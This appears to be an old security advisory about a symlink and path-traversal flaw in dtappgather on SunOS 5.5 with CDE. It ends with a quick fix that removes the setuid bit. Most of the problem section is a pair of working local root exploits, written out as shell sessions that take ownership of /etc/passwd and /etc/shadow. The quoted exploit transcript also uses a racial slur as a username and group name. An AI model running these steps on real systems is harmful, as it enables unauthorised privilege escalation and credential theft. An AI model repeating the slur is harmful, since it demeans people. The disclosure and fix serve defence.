COMMAND
/usr/dt/bin/dtappgather
SYSTEMS AFFECTED
SunOS 5.5 & 5.5.1 running CDE version 1.0.2
PROBLEM
Mastoras found following. Local users can change the ownership of
any file, thus gaining root priviledges. This happens because
"dtappgather" does not check if the file:
/var/dt/appconfig/appmanager/generic-display-0
is a symbolic link and happily chown()s it to the user. When CERT
released advisory CA-98.02 (see CDE in 'mUNIXes' section) about
/usr/dt/bin/dtappgather, Mastoras played a little with dtappgather
and discovered the problem above, but he thought that patch
104498-02 corrects it, as described in SUN's section of 98.02.
After applying the patch, it was still possible to gain root
privs. Following exploit was initially posted to hack.gr's
security mailing list: "haxor".
nigg0r@host% ls -l /etc/passwd
-r--r--r-- 1 root other 1585 Dec 17 22:26 /etc/passwd
nigg0r@host% ln -s /etc/passwd /var/dt/appconfig/appmanager/generic-display-0
nigg0r@host% dtappgather
MakeDirectory: /var/dt/appconfig/appmanager/generic-display-0: File exists
nigg0r@host% ls -l /etc/passwd
-r-xr-xr-x 1 nigg0r niggers 1585 Dec 17 22:26 /etc/passwd
nigg0r@host% echo "nigg0r wins! Fatality!" | mail root
It would be easy to find the exploit if you had read CERT's
advisory. The following steps were enough..
% cp /usr/dt/bin/dtappgather . [you can't "truss" suid proggies]
% truss -o koko ./dtappgather
% more koko
[ shity ld things ]
chown("/var/dt/appconfig/appmanager/generic-display-0", 666, 666) = 0
chmod("/var/dt/appconfig/appmanager/generic-display-0", 0555) = 0
[ shitty things ]
J.A. Gutierrez added how the exploit is much simpler than that.
Simply:
$ id
uid=6969(foo) gid=666(bar)
$ ls -l /etc/shadow
-r-------- 1 root sys 234 Nov 7 1999 /etc/shadow
$ env DTUSERSESSION=../../../../../../../etc/shadow dtappgather
$ ls -l /etc/shadow
-r-xr-xr-x 1 foo bar 234 Nov 7 1999 /etc/shadow
However, first exploit works (at least, on solaris 2.5), even
after patching CDE according to CERT advisory.
SOLUTION
SunOS 5.6 (or CDE 1.2) comes with directory
/var/dt/appconfig/appmanager/ mode 755 so it's not possible to
make the necessary link. On the other hand, in SunOS 5.5* this
dir has mode 777, so you can easily make the link or even
unlink/rename the file "generic-display-0" if exists owned by
another user. Quick Fix:
chmod -s /usr/dt/bin/dtappgather